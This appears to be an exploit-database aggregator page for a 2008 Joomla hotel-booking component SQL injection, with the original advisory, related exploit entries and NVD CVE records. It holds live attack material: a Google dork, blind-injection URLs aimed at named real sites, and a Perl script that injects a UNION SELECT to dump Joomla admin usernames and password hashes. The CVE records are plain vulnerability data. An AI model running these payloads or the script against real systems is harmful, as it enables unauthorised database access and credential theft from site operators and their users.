ID EDB-ID:7567
Type exploitdb
Reporter Hussin X
Modified 2008-12-23T00:00:00
Description
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865,CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
___________________________________
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
_______
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________
# milw0rm.com [2008-12-23]
Published 2008-12-23T00:00:00
Bulletin family exploit
CVSS 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Vulners score 7.6
Href https://www.exploit-db.com/exploits/7567/
Source https://www.exploit-db.com/download/7567/
OSVDB 51548, 50947
Last seen 2016-02-01T03:30:34
Related exploits EDB-ID:7575, EDB-ID:7538, EDB-ID:7539, EDB-ID:7568
{"exploitdb": [{"lastseen": "2016-02-01T03:31:34", "description": "Joomla Component 5starhotels (id) SQL Injection Exploit. CVE-2008-5864,CVE-2008-5865,CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform", "published": "2008-12-24T00:00:00", "type": "exploitdb", "title": "Joomla Component 5starhotels id SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865", "CVE-2008-5874", "CVE-2008-5875"], "modified": "2008-12-24T00:00:00", "id": "EDB-ID:7575", "href": "https://www.exploit-db.com/exploits/7575/", "sourceData": "#!/usr/bin/perl -w\n \n \n#Joomla com_5starhotels Sql injection#\n########################################\n#[~] Author : EcHoLL\n#[~] www.warezturk.org www.tahribat.com\n#[~] Greetz : Black_label TURK Godlike Nitrous\n \n#[!] Module_Name: com_5starhotels\n#[!] Script_Name: Joomla\n#[!] Google_Dork: inurl:\"com_5starhotels\"\n########################################\n \n \nsystem(\"color FF0000\");\nsystem(\"Nohacking\");\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t| Turkish Securtiy Team |\\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\\n\\n\";\nprint \"\\t\\t| Coded by: EcHoLL www.warezturk.org |\\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\n \nuse LWP::UserAgent;\n \nprint \"\\nSite ismi Target page:[http://wwww.site.com/path/]: \";\n chomp(my $target=<STDIN>);\n \n$column_name=\"concat(username,0x3a,password)\";\n$table_name=\"jos_users\";\n \n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n \n$host = $target . 
\"/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,\".$column_name.\"+from/**/\".$table_name.\"--\";\n$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){\n print \"\\n[+] Admin Hash : $1\\n\\n\";\n print \"# Tebrikler Exploit Calisti! #\\n\\n\";\n}\nelse{print \"\\n[-] Exploit Bulunamad\u0102\u0084\u00c2\u0105...\\n\";\n}\n\n# milw0rm.com [2008-12-24]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7575/"}, {"lastseen": "2016-02-01T03:27:03", "description": "Joomla Component com_hbssearch 1.0 Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865. Webapps exploit for php platform", "published": "2008-12-21T00:00:00", "type": "exploitdb", "title": "Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865"], "modified": "2008-12-21T00:00:00", "id": "EDB-ID:7538", "href": "https://www.exploit-db.com/exploits/7538/", "sourceData": "#############################################################\r\nJoomla Component com_hbssearch(r_type) Blind SQL-injection\r\n#############################################################\r\n\r\n\r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Kosova Hackers Group [www.khg-crew.ws]\r\n#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n----------------------------------------\r\n#[!] <author>Joomla HBS</author>\r\n#[!] <client>Administrator</client>\r\n#[!] <authorEmail>dev@joomlahbs.com</authorEmail>\r\n#[!] <authorUrl>http://joomlahbs.com</authorUrl>\r\n#[!] 
<version>1.0.0</version>\r\n###################################################\r\n\r\nExample:\r\nhttp://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]\r\n\r\n\r\nLiveDEMO:\r\n\r\nhttp://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->FALSE\r\n\r\nhttp://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->TRUE\r\n\r\n\r\n##############################\r\n#[!] Proud 2 be Albanian\r\n#[!] Proud 2 be Muslim\r\n#[!] United States of Albania\r\n##############################\r\n\r\n# milw0rm.com [2008-12-21]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7538/"}, {"lastseen": "2016-02-01T03:27:10", "description": "Joomla Component com_tophotelmodule 1.0 Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865. 
Webapps exploit for php platform", "published": "2008-12-21T00:00:00", "type": "exploitdb", "title": "Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865"], "modified": "2008-12-21T00:00:00", "id": "EDB-ID:7539", "href": "https://www.exploit-db.com/exploits/7539/", "sourceData": "#############################################################\r\nJoomla Component com_tophotelmodule(id) Blind SQL-injection\r\n#############################################################\r\n \r\n \r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Kosova Hackers Group [www.khg-crew.ws]\r\n#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n----------------------------------------\r\n#[!] <name>Top Hotel Module</name>\r\n#[!] <creationDate>06/07/2008</creationDate>\r\n#[!] <author>Joomla HBS</author>\r\n#[!] <authorEmail>dev@joomlahbs.com</authorEmail>\r\n#[!] <authorUrl>http://joomlahbs.com</authorUrl>\r\n#[!] <version>1.0.0</version>\r\n###################################################\r\n \r\nExample:\r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]\r\n \r\n \r\nLiveDEMO:\r\n \r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE\r\n \r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE\r\n \r\n \r\n##############################\r\n#[!] Proud 2 be Albanian\r\n#[!] Proud 2 be Muslim\r\n#[!] 
United States of Albania\r\n##############################\r\n\r\n# milw0rm.com [2008-12-21]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7539/"}, {"lastseen": "2016-02-01T03:30:41", "description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability. CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform", "published": "2008-12-23T00:00:00", "type": "exploitdb", "title": "Joomla Component com_allhotels id Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5874", "CVE-2008-5875"], "modified": "2008-12-23T00:00:00", "id": "EDB-ID:7568", "href": "https://www.exploit-db.com/exploits/7568/", "sourceData": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability\n___________________________________\n\nAuthor: Hussin X\n\nHome : www.IQ-TY.com & www.TrYaG.cc\n\n___________________________________\n\nscript : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/\n\nDorK : inurl:index.php?option=com_allhotels\n\nDemo :\n_______\n\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|\n|_____________________________________________________________________\n\n _____ ____ __ __ _ ____ ____ ____\n|_ _| | _ \\ \\ \\ / / / \\ / ___| / ___| / ___|\n | | | |_) | \\ V / / _ \\ | | _ | | | |\n | | | _ < | | / ___ \\ | |_| | _ | |___ | |___\n |_| |_| \\_\\ |_| /_/ \\_\\ \\____| (_) \\____| \\____|\n\n# 
milw0rm.com [2008-12-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7568/"}], "cve": [{"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the Top Hotel (com_tophotelmodule) component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-06T17:30:00", "title": "CVE-2008-5864", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5864"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:com_tophotelmodule:1.0.0", "cpe:/a:joomlahbs:hotel_booking_reservation_system:1.0.0"], "id": "CVE-2008-5864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5864", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_tophotelmodule:1.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! 
allows remote attackers to execute arbitrary SQL commands via the r_type parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-06T17:30:00", "title": "CVE-2008-5865", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5865"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:hotel_booking_reservation_system:1.0.0"], "id": "CVE-2008-5865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5865", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:1.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the com_lowcosthotels component in the Hotel Booking Reservation System (aka HBS) for Joomla! 
allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-08T19:30:00", "title": "CVE-2008-5875", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5875"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:hotel_booking_reservation_system:_nil_", "cpe:/a:joomlahbs:com_lowcosthotels:_nil_"], "id": "CVE-2008-5875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5875", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_lowcosthotels:_nil_:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php in the (1) com_allhotels or (2) com_5starhotels module. 
NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2009-01-08T19:30:00", "title": "CVE-2008-5874", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5874"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:com_5starhotels:_nil_", "cpe:/a:joomlahbs:hotel_booking_reservation_system:_nil_", "cpe:/a:joomlahbs:com_allhotels:_nil_"], "id": "CVE-2008-5874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_allhotels:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_5starhotels:_nil_:*:*:*:*:*:*:*"]}]}